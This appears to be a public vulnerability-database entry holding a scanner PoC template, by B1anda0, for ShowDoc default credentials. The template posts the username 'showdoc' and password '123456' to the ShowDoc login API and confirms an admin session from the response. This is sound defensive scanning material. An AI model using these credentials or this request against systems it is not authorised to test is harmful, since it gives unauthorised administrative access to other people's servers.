showdoc-default-password: Showdoc Default Password

2025-08-01 showdoc-default-password PoC Public

Description

app="ShowDoc"

PoC

id: showdoc-default-password

info:
  name: Showdoc Default Password
  author: B1anda0
  severity: high
  verified: true
  description: |-
    app="ShowDoc"
  tags: default-login,showdoc
  created: 2023/10/30

rules:
  r0:
    request:
      method: POST
      path: /server/index.php?s=/api/user/login
      body: username=showdoc&password=123456
      follow_redirects: true
    expression: response.status == 200 && response.body.bcontains(b'"username":"showdoc"') && response.body.bcontains(b'"uid":"1"') && response.body.bcontains(b'"error_code":0') && response.raw_header.bcontains(b'Set-Cookie:')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities